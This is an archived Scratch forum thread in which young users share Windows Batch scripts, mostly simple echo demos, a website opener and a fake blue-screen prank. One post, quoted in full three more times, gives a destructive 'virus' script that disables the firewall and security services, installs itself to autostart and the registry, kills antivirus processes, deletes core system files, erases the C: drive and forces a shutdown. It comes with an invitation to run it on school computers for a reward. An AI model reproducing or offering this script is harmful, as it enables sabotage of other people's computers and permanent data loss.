This is a read-only archive of the old Scratch 1.x Forums.
Try searching the current Scratch discussion forums.

#1 2012-12-06 17:00:43

bananaman99
New Scratcher
Registered: 2012-02-04
Posts: 100+

Batch Official Topic

For those of you who don't know, Batch is a programming language which I believe comes standard on all Windows computers now. Basically, you open up notepad and enter commands in it for the computer to carry out. It can be used for anything from ease of access programs to simple text-based games. If you want to familiarize yourself with the language, Google can provide you with several excellent tutorials on coding in Batch. It's an excellent segue from Scratch into more complicated programming languages like C++ and JavaScript, to name a few. Discuss anything to do with Batch-problems, projects, ideas, etc.
Thanks, and Batch on! (see what I did there?)

Offline

 

#2 2012-12-06 17:07:14

muppetds
Scratcher
Registered: 2011-02-11
Posts: 1000+

Re: Batch Official Topic

I cant use it - Windows Only - I do use Applescript though

Last edited by muppetds (2012-12-06 17:07:32)


SCRATCH'S PARTLY INSANE RESIDENT 
http://internetometer.com/imagesmall/31691.pnghttp://bluetetrarpg.x10.mx/usercard/?name=muppetds

Offline

 

#3 2012-12-06 18:42:43

Necromaster
Scratcher
Registered: 2010-04-07
Posts: 1000+

Re: Batch Official Topic

I like Batch, although it is very simple it is quite powerful for some things.

Offline

 

#4 2012-12-07 08:28:48

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

Heehee.

I found a fake virus code that shut down my computer.


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#5 2012-12-07 10:29:25

technoguyx
Scratcher
Registered: 2008-10-18
Posts: 1000+

Re: Batch Official Topic

shutdown /s?  tongue

I just read a little about it, knowing a bit would be good c: Pretty much all I can do currently is echo, lol.


http://getgnulinux.org/links/en/linuxliberated_4_78x116.png

Offline

 

#6 2012-12-07 10:47:39

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

technoguyx wrote:

shutdown /s?  tongue

I just read a little about it, knowing a bit would be good c: Pretty much all I can do currently is echo, lol.

Yeah.

MY CODE:

@echo off
echo --------------
echo YO.
echo --------------

pause

echo --------------
echo your computer is being hacked trololol
echo --------------

pause


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#7 2012-12-07 10:57:44

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

I FOUND THIS CODE.

If anyone puts this in their school computer and video tapes, I will give them the batch code to fin my IP. :}

Code:

start
color 5
title Say Goodbye
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now detroyed
msg * You got owned by anonymous!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

it completely crashes the computer. Permanently.
Like literally.

Last edited by mythbusteranimator (2012-12-07 10:59:08)


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#8 2012-12-07 16:07:28

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

It's official.

BATCH is the best prank language.  lol


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#9 2012-12-07 16:17:18

Snowdrift
Scratcher
Registered: 2011-06-22
Posts: 500+

Re: Batch Official Topic

mythbusteranimator wrote:

Code:

start
color 5
title Say Goodbye
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now detroyed
msg * You got owned by anonymous!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

it completely crashes the computer. Permanently.
Like literally.

That's pretty rude  tongue

Offline

 

#10 2012-12-07 16:21:50

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

Snowdrift wrote:

mythbusteranimator wrote:

Code:

start
color 5
title Say Goodbye
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now detroyed
msg * You got owned by anonymous!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

it completely crashes the computer. Permanently.
Like literally.

That's pretty rude  tongue

My post is not meant to be taken  seriously.  tongue


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#11 2012-12-09 09:02:30

SJRCS_011
Scratcher
Registered: 2011-02-07
Posts: 1000+

Re: Batch Official Topic

mythbusteranimator wrote:

I FOUND THIS CODE.

If anyone puts this in their school computer and video tapes, I will give them the batch code to fin my IP. :}

Code:

start
color 5
title Say Goodbye
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now detroyed
msg * You got owned by anonymous!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

it completely crashes the computer. Permanently.
Like literally.

i swear, that'd probably be the one time that I'd forgive Microsoft for putting UAC in Win 7 XD


(jk, i actually like uac a lot)

Last edited by SJRCS_011 (2012-12-09 09:05:10)


http://i.imgur.com/vQqtH.png
Learning to Program in a Nutshell:  "You're missing a closing parentheses" - LS97

Offline

 

#12 2012-12-09 15:08:19

playzooki
Scratcher
Registered: 2012-02-07
Posts: 100+

Re: Batch Official Topic

yeah, try this on your school computer

Code:

@echo off
cd /
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x0000 0000)
echo.
echo.
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause :nul
cls
echo Downloading viruses . . .
ping localhost -n 5 :nul
dir
pause :nul

lol


I iz a sig. So there. CLICK ME ITS SO IMPORTANT!!!!

Offline

 

#13 2012-12-09 15:45:21

muppetds
Scratcher
Registered: 2011-02-11
Posts: 1000+

Re: Batch Official Topic

mythbusteranimator wrote:

I FOUND THIS CODE.

If anyone puts this in their school computer and video tapes, I will give them the batch code to fin my IP. :}

Code:

start
color 5
title Say Goodbye
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now detroyed
msg * You got owned by anonymous!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

it completely crashes the computer. Permanently.
Like literally.

eerm some of the slashes are the wrong way round  hmm


SCRATCH'S PARTLY INSANE RESIDENT 
http://internetometer.com/imagesmall/31691.pnghttp://bluetetrarpg.x10.mx/usercard/?name=muppetds

Offline

 

#14 2012-12-09 16:17:26

Laternenpfahl
Scratcher
Registered: 2011-06-24
Posts: 1000+

Re: Batch Official Topic

mythbusteranimator wrote:

It's official.

BATCH is the best prank language.  lol

Applescript would be useless if it couldn't run shell xD


http://i46.tinypic.com/6yd4c0.png

Offline

 

#15 2012-12-09 16:30:33

epicepicman
Scratcher
Registered: 2011-07-17
Posts: 500+

Re: Batch Official Topic

I found a tutorial and made this:

Code:

@echo off
echo Hi, this is a website opener.
SET /P w=Please enter the name of the website and press enter (make sure you put www. at the begining):
echo Opening website...
start %w%
echo Press any key to exit.
pause>null

I'm quite proud of myself  tongue


If you want something to do while Scratch is down, check out tbgs.tk! It's the new version of the (closed) Scratch TBGS, run by Scratchers! I'm going to spend most of my time there, anyway.

Offline

 

#16 2012-12-09 17:28:46

bananaman99
New Scratcher
Registered: 2012-02-04
Posts: 100+

Re: Batch Official Topic

epicepicman wrote:

I found a tutorial and made this:

Code:

@echo off
echo Hi, this is a website opener.
SET /P w=Please enter the name of the website and press enter (make sure you put www. at the begining):
echo Opening website...
start %w%
echo Press any key to exit.
pause>null

I'm quite proud of myself  tongue

thats actually pretty good for a beginner

Offline

 

#17 2012-12-09 17:34:46

GeonoTRON2000
Scratcher
Registered: 2009-12-24
Posts: 1000+

Re: Batch Official Topic

mythbusteranimator wrote:

I FOUND THIS CODE.

If anyone puts this in their school computer and video tapes, I will give them the batch code to fin my IP. :}

2 problems.
1) I already have your IP :3
2) I don't have a school computer :3


http://i.imgur.com/BAEgGDL.png

Offline

 

#18 2012-12-10 12:27:32

muppetds
Scratcher
Registered: 2011-02-11
Posts: 1000+

Re: Batch Official Topic

GeonoTRON2000 wrote:

mythbusteranimator wrote:

I FOUND THIS CODE.

If anyone puts this in their school computer and video tapes, I will give them the batch code to fin my IP. :}

2 problems.
1) I already have your IP :3
2) I don't have a school computer :3

lol
i think that a work one will suffice as well  big_smile


SCRATCH'S PARTLY INSANE RESIDENT 
http://internetometer.com/imagesmall/31691.pnghttp://bluetetrarpg.x10.mx/usercard/?name=muppetds

Offline

 

#19 2012-12-10 12:35:20

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

GeonoTRON2000 wrote:

mythbusteranimator wrote:

I FOUND THIS CODE.

If anyone puts this in their school computer and video tapes, I will give them the batch code to fin my IP. :}

2 problems.
1) I already have your IP :3
2) I don't have a school computer :3

NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#20 2012-12-13 14:01:50

playzooki
Scratcher
Registered: 2012-02-07
Posts: 100+

Re: Batch Official Topic

mythbusteranimator wrote:

It's official.

BATCH is the best prank language.  lol

Yes, it was used to make the blue screen of death I got on a SCHOOL COMPUTER!!!!

Last edited by playzooki (2012-12-13 14:09:47)


I iz a sig. So there. CLICK ME ITS SO IMPORTANT!!!!

Offline

 

#21 2012-12-13 14:09:16

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

playzooki wrote:

mythbusteranimator wrote:

It's official.

BATCH is the best prank language.  lol

Yes, it used to make the blue screen of death I got on a SCHOOL COMPUTER!!!!

XDXDXDXD

(Apparently, Mokat shut down her school's computer using a userscript.  tongue )


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#22 2012-12-13 16:16:13

epicepicman
Scratcher
Registered: 2011-07-17
Posts: 500+

Re: Batch Official Topic

I found out you can use batch to open Steam games.

Try this if you have Portal 2:

Code:

echo Welcome, this program opens Portal 2 on Steam.
pause
start steam://rungameid/620

If you want something to do while Scratch is down, check out tbgs.tk! It's the new version of the (closed) Scratch TBGS, run by Scratchers! I'm going to spend most of my time there, anyway.

Offline

 

#23 2012-12-14 05:29:12

jontmy00
Scratcher
Registered: 2011-11-28
Posts: 1000+

Re: Batch Official Topic

I need MBA's code for a Mac. >:P

Last edited by jontmy00 (2012-12-14 05:29:20)


FOR ALL THE NEWS ON UPDATES FOR SIMPLISTICRAFT, CLICK HERE.

Offline

 

#24 2012-12-14 08:24:35

mythbusteranimator
Scratcher
Registered: 2012-02-28
Posts: 1000+

Re: Batch Official Topic

jontmy00 wrote:

I need MBA's code for a Mac. > tongue

Does Mac have command prompt? Or Notepad?


http://www.foxtrot.com/comics/2012-04-01-fdb37077.gif
clicky

Offline

 

#25 2012-12-14 08:47:53

jontmy00
Scratcher
Registered: 2011-11-28
Posts: 1000+

Re: Batch Official Topic

mythbusteranimator wrote:

jontmy00 wrote:

I need MBA's code for a Mac. > tongue

Does Mac have command prompt? Or Notepad?

Terminal, TextEdit.


FOR ALL THE NEWS ON UPDATES FOR SIMPLISTICRAFT, CLICK HERE.

Offline

 

Board footer